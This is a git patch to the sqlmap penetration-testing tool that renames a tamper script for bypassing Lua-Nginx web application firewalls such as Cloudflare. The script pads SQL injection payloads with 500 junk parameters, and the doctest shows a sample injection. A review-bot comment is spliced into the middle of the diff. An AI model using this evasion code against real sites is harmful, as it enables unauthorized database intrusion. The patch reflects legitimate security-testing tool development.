From f2035145fe08b9c9fbbc6803e81d9bcffa8c486b Mon Sep 17 00:00:00 2001 From: Miroslav Stampar Date: Fri, 26 Oct 2018 12:10:22 +0200 Subject: [PATCH] Another update related to the #3316 --- doc/THANKS.md | 2 +- lib/core/settings.py | 2 +- tamper/luanginx.py | 36 ++++++++++++++++++++++++++ tamper/luanginxwafbypass.py | 51 ------------------------------------- txt/checksum.md5 | 3 ++- 5 files changed, 40 insertions(+), 54 deletions(-) create mode 100644 tamper/luanginx.py delete mode 100644 tamper/luanginxwafbypass.py diff --git a/doc/THANKS.md b/doc/THANKS.md index e9e20cfdf..e9eb7456d 100644 --- a/doc/THANKS.md +++ b/doc/THANKS.md @@ -566,7 +566,7 @@ Efrain Torres, * for his great Metasploit WMAP Framework Jennifer Torres, -* for contributing a tamper script luanginxwafbypass.py +* for contributing a tamper script luanginx.py Sandro Tosi, * for helping to create sqlmap Debian package correctly diff --git a/lib/core/settings.py b/lib/core/settings.py index 1b8cff396..4a61e03ff 100644 --- a/lib/core/settings.py +++ b/lib/core/settings.py @@ -19,7 +19,7 @@ from lib.core.enums import DBMS_DIRECTORY_NAME from lib.core.enums import OS # sqlmap version (...) -VERSION = "1.2.10.31" +VERSION = "1.2.10.32" TYPE = "dev" if VERSION.count('.') > 2 and VERSION.split('.')[-1] != '0' else "stable" TYPE_COLORS = {"dev": 33, "stable": 90, "pip": 34} VERSION_STRING = "sqlmap/%s#%s" % ('.'.join(VERSION.split('.')[:-1]) if VERSION.count('.') > 2 and VERSION.split('.')[-1] == '0' else VERSION, TYPE) diff --git a/tamper/luanginx.py b/tamper/luanginx.py new file mode 100644 index 000000000..bca93e16e --- /dev/null +++ b/tamper/luanginx.py 
@@ -0,0 +1,36 @@
+#!/usr/bin/env python
+
+"""
+Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
+See the file 'LICENSE' for copying permission
+"""
+
+import string
+import random
+
+from lib.core.enums import HINT
+from lib.core.enums import PRIORITY
+from lib.core.settings import DEFAULT_GET_POST_DELIMITER
+
+__priority__ = PRIORITY.NORMAL
+
+def tamper(payload, **kwargs):
+ """
+ LUA-Nginx WAFs Bypass (e.g. Cloudflare)
+
+ Reference:
+ * https://opendatasecurity.io/cloudflare-vulnerability-allows-waf-be-disabled/
+
+ Notes:
+ * Lua-Nginx WAFs do not support processing of more than 100 parameters
+
+ >>> random.seed(0); hints={}; payload = tamper("1 AND 2>1", hints=hints); "%s&%s" % (hints[HINT.PREPEND], payload)
+ '0U=&Aq=&Fz=&Ws=&DK=&4F=&rU=&Mp=&48=&Y3=&tT=&3Q=&Dg=&AL=&47=&D1=&qX=&Ia=&Sy=&ZP=&aE=&1p=&u1=&lJ=&o7=&XB=&et=&F5=&gI=&RH=&YH=&7L=&KB=&Kx=&Js=&lL=&OD=&fU=&25=&03=&5H=&yR=&rY=&03=&K6=&JB=&O9=&4X=&fL=&EN=&0p=&Th=&nX=&uY=&gj=&Rc=&J4=&HQ=&bN=&LJ=&yw=&8c=&b7=&lh=&nX=&6b=&Ag=&qn=&Ov=&lF=&cg=&9m=&wT=&Z4=&kP=&7d=&P0=&vp=&LB=&kD=&zJ=&Ft=&wZ=&pI=&aT=&uc=&ro=&7v=&rw=&6N=&MS=&yz=&Oa=&lu=&oN=&x2=&Jz=&yR=&zP=&cB=&qj=&GE=&IU=&2E=&tC=&Y2=&Yl=&9N=&fS=&9y=&Qt=&nS=&aZ=&Gg=&hO=&2r=&8g=&0y=&fr=&CX=&1i=&GO=&v2=&rb=&cQ=&I6=&64=&cU=&RO=&S3=&Nx=&Hm=&Ka=&ju=&WS=&uM=&ck=&8r=&yI=&sD=&oc=&lG=&ey=&uz=&g4=&D0=&8v=&DR=&As=&T3=&5M=&x8=&Ne=&fU=&da=&yG=&BE=&KQ=&Aw=&9q=&WA=&wd=&1R=&3B=&Ph=&ym=&c6=&nj=&mx=&Hj=&98=&jz=&Q2=&E4=&tE=&EP=&mL=&nv=&73=&Yc=&jp=&W0=&KS=&Ye=&f1=&cn=&ca=&0u=&jO=&8F=&3F=&JQ=&XU=&9U=&4m=&HL=&ZD=&Xy=&K0=&XO=&al=&Fp=&e1=&6s=&zY=&dN=&hr=&Zd=&cz=&E1=&SP=&j9=&zL=&xc=&Dj=&cM=&Ng=&Iv=&xW=&E2=&LC=&Nu=&hQ=&MW=&h4=&X4=&2Q=&YG=&Wl=&WB=&UC=&We=&c5=&E3=&6P=&Jn=&fY=&3W=&RA=&sh=&AJ=&56=&zg=&VT=&bB=&Qb=&47=&Se=&ew=&bv=&a8=&Ye=&3m=&mP=&6h=&aw=&bL=&1l=&gv=&7i=&7w=&Ds=&67=&Nl=&9g=&Kj=&36=&Xt=&pU=&sA=&ci=&be=&eA=&IT=&iA=&Nf=&Bw=&6d=&zT=&tm=&sD=&6X=&rI=&QX=&By=&VA=&pC=&6i=&CN=&Dm=&aR=&Ma=&sV=&MH=&jR=&DQ=&Vo=&Vr=&9h=&2c=&pG=&Ky=&gp=&rU=&4K=&cX=&sv=&Gp=&5k=&zr=&GJ=&MG=&zN=&zW=&Ws=&xM=&jR=&xK=&iP=&vD=&zD=&Rt=&Od=&sU=&dM=&bD=&3a=&Ge=&1Q=&UP=&ac=&M9=&2R=&To=&Ur=&gC=&uk=&A3=&AB=&RG=&i4=&BW=&yY=&yn=&m6=&Kd=&yo=&fl=&dN=&kL=&LR=&Fr=&2v=&CN=&F7=&75=&5K=&ER=&nq=&ck=&aO=&iW=&Q8=&y5=&Cv=&g2=&Xu=&Cu=&bc=&wm=&Gl=&mP=&Tt=&1p=&vS=&c5=&eC=&Sc=&Y8=&Ch=&fg=&Vz=&4B=&eA=&UZ=&cl=&Eh=&25=&tA=&Ir=&Hm=&sB=&LH=&qo=&hW=&gT=&pr=&TO=&TF=&1h=&Oh=&Tw=&PR=&On=&Zo=&GP=&oM=&rk=&YI=&uK=&bi=&y8=&Fe=&VW=&WJ=&Rn=&TY=&Vv=&KM=&3g=&ZG=&wC=&an=&OE=&7D=&t0=&qL=&RY=&Wx=&dc=&T7=&vB=&SO=&qP=&sw=&HT=&jb=&Mb=&cn=&Oe=&d8=&A3=&nA=&wk=&u9=&Ux=&zq=>=&QC=&c5=&zy=&ai=&1F=&Tj=&u0=&Yp=&bY=&kW=&Qk=&e5=&LM=&Cj=&Lp=&XT=&b5=&cf=&sj=&ow=&Tz=&qE=&yt=&3I=&8V=&Jq=&QC=&Sz=&Eb=&Tc=&QK=&Wr=&Qm=&Gv=&8m=&Ju=&85=&KS=&Qv=&43=&uU=&aY=&J7=&wM=&uW=&L9=&ai=&ch=&56=&D6=&YW=&Ul=&1 AND 2>1'
+ """
+
+ hints = kwargs.get("hints", {})
+ delimiter = kwargs.get("delimiter", DEFAULT_GET_POST_DELIMITER)
+
+ hints[HINT.PREPEND] = delimiter.join("%s=" % "".join(random.sample(string.letters + string.digits, 2)) for _ in xrange(500))
+
+ return payload
diff --git a/tamper/luanginxwafbypass.py b/tamper/luanginxwafbypass.py
deleted file mode 100644
index 5b694545b..000000000
--- a/tamper/luanginxwafbypass.py
+++ /dev/null
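Review bot: `string.letters` in the `random.sample(...)` call that builds `hints[HINT.PREPEND]` is locale-dependent under Python 2 (and does not exist in Python 3), so if the process runs under a non-C locale the generated parameter names can include non-ASCII bytes and the seeded doctest output no longer matches; `string.ascii_letters` yields the same 52 characters in every locale: `hints[HINT.PREPEND] = delimiter.join("%s=" % "".join(random.sample(string.ascii_letters + string.digits, 2)) for _ in xrange(500))`. The doctest pins a 500-name sequence to `random.seed(0)`, which also ties it to one interpreter's `random.sample` implementation; asserting the number of generated names (e.g. `hints[HINT.PREPEND].count("=") == 500`) would be far less brittle than the literal string. When the caller passes no `hints` dict, the prepended parameters go into a throwaway dict and the call returns `payload` unchanged, which is worth stating in the docstring, e.g. `The injected parameters are exposed only through the 'hints' keyword argument; the payload itself is returned unmodified.`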
@@ -1,51 +0,0 @@ -#!/usr/bin/env python -# -*- coding: utf-8 -*- - -""" -Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/) -See the file 'LICENSE' for copying permission -""" - -''' -[+] LUA-Nginx WAFs Bypass (Cloudflare) -Lua-Nginx WAFs doesn't support processing for more than 100 parameters. - -Example: sqlmap -r file.txt --tamper=luanginxwafbypass.py --dbs --skip-urlencode -p vulnparameter -Required options: --skip-urlencode, -p -''' - -import sys -import string -import random -from lib.core.enums import PRIORITY -from lib.core.data import conf -__priority__ = PRIORITY.HIGHEST - -''' Random parameter''' -def randomParameterGenerator(size=6, chars=string.ascii_uppercase + string.digits): - output = ''.join(random.choice(chars) for _ in range(size)) - return output - -''' Tamper ''' -def tamper(payload, **kwargs): - try: - headers = kwargs.get("headers", {}) - randomParameter = randomParameterGenerator() - parameter = conf["testParameter"][0] - - if not parameter: - print "\n[-] [ERROR] Add an injectable parameter with -p option (-p param)" - sys.exit(0) - - if conf["skipUrlEncode"] != True: - print "\n[-] [ERROR] --skip-urlencode option must be activated" - sys.exit(0) - - # Add 500 parameters to payload - luaBypass = ("&" + randomParameter + "=")*500 + "&" - outputPayload = luaBypass + parameter + "=" + payload - - return outputPayload - except Exception as error: - print error - return None diff --git a/txt/checksum.md5 b/txt/checksum.md5 index fa2c02401..31960d072 100644 --- a/txt/checksum.md5 +++ b/txt/checksum.md5 
@@ -49,7 +49,7 @@ c8c386d644d57c659d74542f5f57f632 lib/core/patch.py 0c3eef46bdbf87e29a3f95f90240d192 lib/core/replication.py a7db43859b61569b601b97f187dd31c5 lib/core/revision.py fcb74fcc9577523524659ec49e2e964b lib/core/session.py -737cfceb9db54a600e3983ef350f939a lib/core/settings.py +47482757115424a7155720ee7d3e0ced lib/core/settings.py dd68a9d02fccb4fa1428b20e15b0db5d lib/core/shell.py a7edc9250d13af36ac0108f259859c19 lib/core/subprocessng.py 47ad325975ab21fc9f11d90b46d0d143 lib/core/target.py @@ -261,6 +261,7 @@ ef0639557a79e57b06296c4bc223ebef tamper/htmlencode.py 1e5532ede194ac9c083891c2f02bca93 tamper/__init__.py 2dc49bcd6c55f4e2322b07fa92685356 tamper/least.py 40d1ea0796fd91cb3cdd602e36daed15 tamper/lowercase.py +a54b361da0ac6988d0b97bc79463615d tamper/luanginx.py 1c4d622d1c2c77fc3db1f8b3849467ee tamper/modsecurityversioned.py f177a624c2cd3431c433769c6eb995e7 tamper/modsecurityzeroversioned.py 91b63afdb96b1d51c12a14cbd425d310 tamper/multiplespaces.py